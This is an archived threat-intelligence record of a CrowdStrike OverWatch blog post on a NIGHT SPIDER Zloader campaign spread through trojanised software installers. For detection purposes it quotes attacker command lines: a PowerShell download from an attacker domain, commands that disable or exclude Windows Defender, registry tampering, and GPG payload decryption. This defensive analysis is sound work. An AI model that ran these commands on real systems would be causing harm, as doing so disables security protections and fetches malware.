{
	"id": "a438b099-4fc3-4e89-9f6c-8960ef69a47b",
	"created_at": "2026-04-06T00:15:12.762494Z",
	"updated_at": "2026-04-10T03:21:11.347668Z",
	"deleted_at": null,
	"sha1_hash": "67ec3863d63116c62fba506d0777b78efb13c6fe",
	"title": "OverWatch Uncovers Ongoing NIGHT SPIDER Zloader Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131366,
	"plain_text": "OverWatch Uncovers Ongoing NIGHT SPIDER Zloader\r\nCampaign\r\nBy falcon.overwatch.team\r\nArchived: 2026-04-05 17:01:12 UTC\r\nOver recent months, the CrowdStrike Falcon® OverWatch™ team has tracked an ongoing, widespread intrusion\r\ncampaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside\r\nlegitimate software. These payloads and scripts were used to perform reconnaissance and ultimately download and\r\nexecute NIGHT SPIDER's Zloader trojan, as detailed in CrowdStrike CROWDSTRIKE FALCON®\r\nINTELLIGENCE™ Premium reporting. This blog shows how OverWatch went about tracking and alerting\r\ncustomers to this activity, despite the adversary’s attempts to evade detection.\r\nAttempts to Hide Prove to Be the Key to Being Found\r\nWhether it’s adopting new tools or new techniques, adversaries continuously iterate their operations in an effort to\r\nstay a step ahead of defenders. What sets OverWatch apart is its focus on detecting exactly this type of anomalous\r\nactivity rather than relying on atomic and static indicators to look for known threats.\r\nLate in 2021, OverWatch detected a wave of activity leveraging bundled .msi installers to execute scripts and\r\nremotely download additional malicious payloads. The initial installers were masquerading as legitimate Zoom,\r\nAtera, NetSupport, Brave Browser, JavaPlugin and TeamViewer installers, but the programs were also packaged\r\nwith malicious scripts and payloads to perform automated reconnaissance and download the Zloader trojan, and in\r\nsome cases, Cobalt Strike. The adversary’s use of evasive techniques was ultimately what enabled OverWatch to\r\nquickly zero in on these attempted intrusions.\r\nFigure 1. Process tree that shows OverWatch detection of Launcher.exe executing malicious scripts, remotely\r\ndownloading additional payloads and leveraging native utilities (Click to enlarge)\r\nhttps://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nPage 1 of 4\n\nOverWatch’s detective capability against this campaign can be attributed to three pillars of analysis that threat\r\nhunters use to rapidly assess hunting leads: behavior, prevalence and timing. In the case of this campaign,\r\nOverWatch uncovered suspicious behaviors associated with the use of native utilities, the presence of low-prevalence files and the coincidence of both of these in a short time period impacting several customers. In fact, it\r\nwas the adversary’s attempts to evade detection that so quickly caught OverWatch’s attention. The list that follows\r\noutlines the suspicious behaviors that OverWatch observed in the analyzed Zloader campaign, which was\r\ndeveloped by NIGHT SPIDER. The list also shows example command lines related to these behaviors.\r\nNumerous unknown scripts spawned from a low-prevalence binary packaged in high-prevalence .msi files\r\nwith well-known names (Team Viewer, Zoom, NetSupport Manager, Atera, Brave Browser, JavaPlugin)\r\nand legitimate hashes. \r\nThe Microsoft Windows command or wscript utility used PowerShell to beacon to the internet and\r\nremotely download a payload.\r\npowershell  Invoke-WebRequest https[:]//clouds222[.]com/t1m/index/processingSetRequestBat2/?\r\nservername=msi -OutFile flash.bat\r\nThe downloaded payload was a low-prevalence file.\r\nThe scripts used the Windows-native Mshta utility or PowerShell to impair Windows Defender. \r\nPowershell.exe -command “Set0MpPreference -DisableIOAVProtection $true”\r\npowershell.exe  -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\\Users\\User\\AppData\\Roaming*'\r\nThe scripts used PowerShell in an attempt to bypass Microsoft’s AntiMalware Scan Interface (AMSI).\r\nThe adminpriv.exe utility was used in an attempt to manipulate registry values.\r\nadminpriv  -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows\r\nDefender\\UX Configuration\"  /v \"Notification_Suppress\" /t REG_DWORD /d \"1\" /f\r\nadminpriv  -U:T -ShowWindowMode:Hide  sc delete  windefend\r\nMSIEXEC was used in an unusual manner to manipulate registry entries that would suggest process abuse.\r\nA script was used to issue a sleep command and decrypt a payload using the legitimate GPG software. The\r\nsame password was observed at various customers.\r\n\"C:\\Users\\[User]\\AppData\\Local\\Temp\\WScriptSleeper.vbs\" 45000\r\nCMD: PowerShell -NoProfile -ExecutionPolicy Bypass -command Import-Module GnuPg;\r\nRemove-Encryption -FolderPath C:\\Users\\[REDACTED]\\AppData\\Roaming -Password\r\n[REDACTED]\r\nCMD: \"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase [REDACTED] -\r\no C:\\Users\\[REDACTED]\\AppData\\Roaming\\zoom.dll -d C:\\Users\\\r\n[REDACTED]\\AppData\\Roaming\\zoom.dll.gpg\r\nhttps://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nPage 2 of 4\n\nThree Pillars of Rapid Assessment: Behavior, Prevalence and Timing\r\nOverWatch hunts for the last 1% of malicious activity that seeks to evade technology-based defenses. To achieve\r\nthis, threat hunters must build a picture not just from one or two data points, but by carefully piecing together a\r\nmyriad of subtle clues when something doesn’t look quite right.\r\n1. OverWatch hunts for unexpected behaviors stemming from otherwise mundane or routine actions. This\r\nmeans threat hunters need a deep familiarity with the wide variety of processes, applications, operating\r\nsystems, configurations, network communications and network architectures that represent the sum of\r\nnormal day-to-day operations. Similarly, hunters need a deep understanding of adversary tradecraft,\r\nexploits and the way that normal day-to-day operations can be manipulated for malicious purposes. This\r\nbreadth and depth of knowledge means that hunters can rapidly identify anomalous behaviors by\r\nidentifying activity that does not align with expected intent or functionality of a system. In the case of the\r\nbundled installer campaign, OverWatch observed an unidentified file attempting to bypass security on\r\nmore than one occasion, which immediately stood out as unusual. \r\n2. Prevalence also plays an important role in threat hunting, as low-prevalence behaviors can be indicative of\r\na system being used for unintended purposes. CrowdStrike Threat Graph® provides OverWatch with real-time visibility across the entire Falcon platform install base, while patented tooling enables threat hunters\r\nto immediately pivot on an indicator to determine whether it is common or not — not just within one\r\nenvironment but across all environments. In scenarios where there is suspicious behavior coupled with\r\nlow-prevalence indicators, these two pillars provide circumstantial findings to inform hunters’ analysis.\r\n3. Time is the third pillar of threat hunting. Suspicious behavior and low-prevalence indicators, all uncovered\r\nin a short period of time sound alarm bells for threat hunters. This trifecta of activity can often indicate\r\nsuccessful targeted phishing attempts, new campaigns or the active exploitation of a zero-day in an\r\napplication. In the example of the Zloader malicious installer campaign, OverWatch’s extensive data and\r\nfinely tuned hunting leads effectively identified the coincidence of 8-10 suspicious behaviors all within\r\nseconds of each other. This left hunters in no doubt that the activity was malicious and enabled them to\r\nsend timely and high-fidelity notifications to the victim organizations. \r\nNowhere to Hide for NIGHT SPIDER\r\nThe powerful combination of the vast telemetry of the CrowdStrike Security Cloud and OverWatch’s patented\r\nhunting workflows and expert threat hunters enabled the rapid identification of NIGHT SPIDER’s Zloader\r\ncampaign. The threat actor’s attempts to avoid detection caught the attention of threat hunters who were able to\r\nquickly piece together the evidence of a campaign in progress. Early detection of campaigns such as this enables\r\nOverWatch to provide organizations with early warning about threats to their environment and empowers\r\norganizations to remediate before any significant damage is done.\r\nAdditional Resources\r\nRead the 2021 Threat Hunting Report blog or download the report now.\r\nLearn more about Falcon OverWatch’s proactive managed threat hunting.\r\nDiscover the power of tailored threat hunting OverWatch Elite provides customers in this blog post.\r\nhttps://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nPage 3 of 4\n\nWatch how Falcon OverWatch proactively hunts for threats in your environment.\r\nLearn more about CrowdStrike Falcon® Intelligence Premium cyber threat intelligence.\r\nRead more about how part-time threat hunting is simply not enough in this blog post.\r\nLearn more about the CrowdStrike Falcon®® platform.\r\nSource: https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nhttps://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/"
	],
	"report_names": [
		"falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434512,
	"ts_updated_at": 1775791271,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.pdf",
		"text": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.txt",
		"img": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.jpg"
	}
}